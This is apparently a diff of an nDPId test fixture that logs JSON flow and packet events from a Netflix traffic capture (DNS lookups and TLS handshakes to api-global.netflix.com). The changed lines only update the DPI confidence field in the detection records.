00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035004,"flow_last_seen":1484319035004,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1484319035004,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51949,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1484319035004,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1484319035004,"pkt":"gCqoTGHM5JjWH70UCABFAABT4P4AAP8RV0LAqAEHwKgBAcrtADUAP\/fHGiEBAAABAAAAAAAACmFwaS1nbG9iYWwHbGF0ZW5jeQZwcm9kYWEHbmV0ZmxpeANjb20AAAEAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035004,"flow_last_seen":1484319035004,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1484319035004,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51949,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035004,"flow_last_seen":1484319035004,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1484319035004,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51949,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00681{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1484319035024,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1484319035024,"pkt":"5JjWH70UgCqoTGHMCABFAADT4UNAAEAR1X3AqAEBwKgBBwA1yu0AvyycGiGBgAABAAgAAAAACmFwaS1nbG9iYWwHbGF0ZW5jeQZwcm9kYWEHbmV0ZmxpeANjb20AAAEAAcAMAAEAAQAAADoABDRZJ4vADAABAAEAAAA6AAQ0KHEVwAwAAQABAAAAOgAENrvKVcAMAAEAAQAAADoABDQnzgXADAABAAEAAAA6AAQ2lKPwwAwAAQABAAAAOgAENrujrcAMAAEAAQAAADoABDQoEorADAABAAEAAAA6AAQ0KGy7"} -00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":209,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319035004,"flow_last_seen":1484319035024,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1484319035024,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51949,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.89.39.139"}} +00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":209,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319035004,"flow_last_seen":1484319035024,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1484319035024,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51949,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.89.39.139"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035079,"flow_last_seen":1484319035079,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319035079,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1484319035079,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319035079,"pkt":"gCqoTGHM5JjWH70UCABFAABAYJ9AAEAGvIXAqAEHNFkni8+MAbsc0sO0AAAAALAC\/\/+HyQAAAgQFtAEDAwUBAQgKH2TAbQAAAAAEAgAA"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035080,"flow_last_seen":1484319035080,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319035080,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -82,36 +82,36 @@ 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1484319035130,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319035130,"pkt":"gCqoTGHM5JjWH70UCABFAAA0gZlAAEAGm5fAqAEHNFkni8+MAbsc0sO15elB0YAQEBUZAAAAAQEICh9kwKCtiMj8"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1484319035130,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319035130,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGNAk0WSeLwKgBBwG7z40HBfk7mRgRP6ASReoSOAAAAgQFtAQCCAqtiMj8H2TAbgEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1484319035132,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319035132,"pkt":"gCqoTGHM5JjWH70UCABFAAA0YNFAAEAGvF\/AqAEHNFkni8+NAbuZGBE\/BwX5PIAQEBV2pwAAAQEICh9kwKGtiMj8"} -00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319035079,"flow_last_seen":1484319035134,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319035134,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":225,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319035080,"flow_last_seen":1484319035136,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319035136,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":227,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319035079,"flow_last_seen":1484319035185,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1484319035185,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01477{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319035079,"flow_last_seen":1484319035186,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3104,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1484319035186,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":231,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319035080,"flow_last_seen":1484319035200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1484319035200,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01477{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":232,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319035080,"flow_last_seen":1484319035215,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3104,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1484319035215,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} +00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319035079,"flow_last_seen":1484319035134,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319035134,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":225,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319035080,"flow_last_seen":1484319035136,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319035136,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":227,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319035079,"flow_last_seen":1484319035185,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1484319035185,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01477{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319035079,"flow_last_seen":1484319035186,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3104,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1484319035186,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":231,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319035080,"flow_last_seen":1484319035200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1484319035200,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01477{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":232,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319035080,"flow_last_seen":1484319035215,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3104,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1484319035215,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035342,"flow_last_seen":1484319035342,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319035342,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1484319035342,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319035342,"pkt":"gCqoTGHM5JjWH70UCABFAABA3CdAAEAGQP3AqAEHNFkni8+OAbvRf5R9AAAAALAC\/\/8BVgAAAgQFtAEDAwUBAQgKH2TBaAAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1484319035397,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319035397,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGMwk0WSeLwKgBBwG7z47YAyXj0X+UfqASRepXrQAAAgQFtAQCCAqtiMk\/H2TBaAEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1484319035399,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319035399,"pkt":"gCqoTGHM5JjWH70UCABFAAA0+2BAAEAGIdDAqAEHNFkni8+OAbvRf5R+2AMl5IAQEBW8GgAAAQEICh9kwZ2tiMk\/"} -00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319035342,"flow_last_seen":1484319035401,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319035401,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":279,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319035342,"flow_last_seen":1484319035449,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319035449,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319035342,"flow_last_seen":1484319035401,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319035401,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 